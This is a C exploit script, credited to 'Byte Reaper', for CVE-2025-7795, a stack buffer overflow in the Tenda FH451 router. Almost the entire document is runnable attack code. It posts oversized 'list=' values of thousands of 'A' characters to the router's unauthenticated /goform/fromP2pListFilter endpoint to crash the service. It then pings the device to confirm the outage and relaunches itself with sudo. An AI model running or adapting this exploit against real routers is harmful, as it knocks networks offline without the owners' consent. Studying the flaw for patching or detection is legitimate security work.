Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow

/*
 * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
 * Author        : Byte Reaper
 * Telegram      : @ByteReaper0
 * CVE           : CVE-2025-7795
 * Vulnerability : Buffer Overflow
 * Description   :
 *   A buffer overflow vulnerability affecting certain Tenda routers,
 *   exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash.
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "argparse.h"
#include <arpa/inet.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/wait.h>

#define FULL_URL 2500
#define POST_DATA 10000

const char *targetUrl = NULL;
const char *targetip = NULL;
int selectIp  = 0;
int selectUrl  = 0;
int verbose = 0;
int showOne = 0;
char postData[POST_DATA];

struct Mem
{
    char *buffer;
    size_t len;
};

size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    size_t total = size * nmemb;
    struct Mem *m = (struct Mem *)userdata;
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp) return 0;
    m->buffer = tmp;
    memcpy(&(m->buffer[m->len]), ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

void pingPacket()
{
    int pid = fork();
    printf("\n============================================== [Ping] ==============================================\n");
    if (pid < 0)
    {
        perror("\e[1;31m[-] Fork Failed!\e[0m");
        exit(1);
    }
    if (pid == 0)
    {
        printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n",
               getpid());
        char *const argv[] = { "/bin/ping",
            "-c",
            "3",
            (char *)targetip,
            NULL };
            char *const envp[] = { NULL };
            __asm__ volatile
            (
                "mov $59, %%rax\n\t"
                "mov %[prog], %%rdi\n\t"
                "mov %[argv], %%rsi\n\t"
                "mov %[envp], %%rdx\n\t"
                "syscall\n\t"
                "mov $60, %%rax\n\t"
                "xor %%rdi, %%rdi\n\t"
                "syscall\n\t"
                :
                : [prog] "r" (argv[0]),
             [argv] "r" (argv),
             [envp] "r" (envp)
             : "rax", "rdi", "rsi", "rdx"
            );
    }
    else
    {
        printf("\e[1;32m[+] Main PID : %d\e[0m\n",
               getpid());
        int status;
        waitpid(pid,
                &status,
                0);
        if (WIFEXITED(status))
        {
            int code = WEXITSTATUS(status);
            printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n",
                   code);
            if (code == 0)
            {
                printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n");
                printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m");
            }
            else
            {
                printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n");
                printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n");
            }
        }
    }
    printf("\n============================================================================================\e[0m\n");
}

void sendRequest()
{
    CURL *c = curl_easy_init();
    CURLcode res;
    char full[FULL_URL];
    struct Mem response = {NULL, 0};
    if (!c) {
        printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
        exit(EXIT_FAILURE);
    }
    if (targetip) selectIp = 1;
    if (targetUrl) selectUrl = 1;
    if (selectIp)
    {
        snprintf(full,
                 sizeof(full),
                 "http://%s/goform/fromP2pListFilter",
                 targetip);
    }
    if (selectUrl)
    {
        snprintf(full,
                 sizeof(full),
                 "%s/goform/fromP2pListFilter",
                 targetUrl);
    }
    int rounds = 5;
    int baseLen = 3500, step = 1000;
    showOne = 1;
    for (int i = 0; i < rounds; i++)
    {
        int len = baseLen + i * step;
        if (len + 6 >= sizeof(postData)) break;
        snprintf(postData, sizeof(postData), "list=");
        memset(postData + 5, 'A', len);
        postData[5 + len] = '\0';
        printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n",
               i+1,
               i+1,
               len);
        if (verbose)
        {
            printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n");
            printf("%s\e[0m\n\n", postData);
            printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n");
        }

        curl_easy_reset(c);
        curl_easy_setopt(c,
                         CURLOPT_URL,
                         full);
        curl_easy_setopt(c,
                         CURLOPT_ACCEPT_ENCODING,
                         "");
        curl_easy_setopt(c,
                         CURLOPT_FOLLOWLOCATION,
                         1L);
        curl_easy_setopt(c,
                         CURLOPT_POST,
                         1L);
        curl_easy_setopt(c,
                         CURLOPT_POSTFIELDS,
                         postData);
        curl_easy_setopt(c,
                         CURLOPT_POSTFIELDSIZE,
                         (long)strlen(postData));
        curl_easy_setopt(c,
                         CURLOPT_WRITEFUNCTION,
                         write_cb);
        curl_easy_setopt(c,
                         CURLOPT_WRITEDATA,
                         &response);
        curl_easy_setopt(c,
                         CURLOPT_CONNECTTIMEOUT,
                         5L);
        curl_easy_setopt(c,
                         CURLOPT_TIMEOUT,
                         10L);
        curl_easy_setopt(c,
                         CURLOPT_SSL_VERIFYPEER,
                         0L);
        curl_easy_setopt(c,
                         CURLOPT_SSL_VERIFYHOST,
                         0L);
        struct curl_slist *h = NULL;
        h = curl_slist_append(h,
                              "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        h = curl_slist_append(h,
                              "Accept-Encoding: gzip, deflate, br");
        h = curl_slist_append(h,
                              "Accept-Language: en-US,en;q=0.5");
        h = curl_slist_append(h,
                              "Connection: keep-alive");
        h = curl_slist_append(h,
                              "Referer: http://example.com");
        h = curl_slist_append(h,
                              "Cache-Control: no-cache");
        h = curl_slist_append(h,
                              "Pragma: no-cache");
        curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
        if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);

        char *encode1 = curl_easy_escape(c, full, 0);
        if (!encode1)
        {
            printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
            exit(EXIT_FAILURE);
        }
        if (verbose && showOne)
        {
            printf("\e[1;37m=========================================");
            if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n",
                targetUrl,
                encode1,
                full);
            if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n",
                targetip,
                full);
            printf("=========================================");
            showOne = 0;
        }
        res = curl_easy_perform(c);
        curl_slist_free_all(h);
        curl_free(encode1);
        if (response.buffer)
        {
            free(response.buffer);
            response.buffer = NULL;
            response.len = 0;
        }
        if (res == CURLE_OK)
        {
            long httpCode = 0;
            printf("\e[1;36m[+] Request sent successfully\e[0m\n");
            curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE,
                              &httpCode);
            printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n",
                   httpCode);
            if (httpCode >= 200 && httpCode < 300)
            {
                printf("\e[1;31m[-] The server was not affected, still working !\n");
                printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
                printf("%s\e[0m\n",
                       response.buffer);
                printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
            }
            else
            {
                printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n");
                printf("[+] Run Command Ping For Check Connection : \e[0m\n");
                if (selectIp) pingPacket();
                else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n");
            }
        }
        else
        {
            printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n");
            printf("[-] Error : %s\n", curl_easy_strerror(res));
        }
    }
    free(response.buffer);
    curl_easy_cleanup(c);
}

int main(int argc,
         const char **argv)
{
    printf(
        "\e[1;31m"
        "▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▄▖▄▖▄▖ \n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n"
        "▙▖▚▘▙▖  ▙▖█▌▙▖▄▌   ▌ ▌▄▌▄▌ \n"
        "              \e[1;37mByte Reaper\e[0m\n"
    );
    printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
    if (getuid() != 0)
    {
        printf("===================================================\e[0m\n");
        printf("[-] Not running as root. Trying with sudo...\e[0m\n");

        char *args[] = {(char*)"sudo",
            (char*)"./exploit",
            NULL};
            execvp("sudo", args);

            perror("[-] Error Run Exploit in Root !");
            __asm__ volatile
            (
                "mov $0x3C, %%rax\n\t"
                "xor %%rdi, %%rdi\n\t"
                "syscall\n\t"
                :
                :
                : "rdi"
            );
    }
    printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
    printf("===================================================\e[0m\n");

    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('i',
                  "ip",
                   &targetip,
                   "Enter Target IP"),
        OPT_STRING('u',
                    "url",
                    &targetUrl,
                    "Enter Target URL"),
        OPT_BOOLEAN('v',
                    "verbose",
                    &verbose,
                    "Verbose Mode"),
        OPT_END(),
    };

    struct argparse argparse;
    argparse_init(&argparse,
                  options,
                  NULL,
                  0);
    argparse_parse(&argparse,
                   argc,
                   argv);

    if (!targetip && !targetUrl)
    {
        printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n");
        printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n");
        printf("[+] OR \n");
        printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n");
        __asm__ volatile(
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "1:\n\t"
            "syscall\n\t"
            :
            :
            : "rax", "rdi", "rsi"
        );
    }
    if (targetip && targetUrl)
    {
        printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n");
        __asm__ volatile
        (
            "mov $0x3C, %%rax\n\t"
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            :
            :
            :"rdi"
        );
    }
    if (selectIp)
    {
        sendRequest();
    }
    else
    {
        sendRequest();
    }


    return 0;
}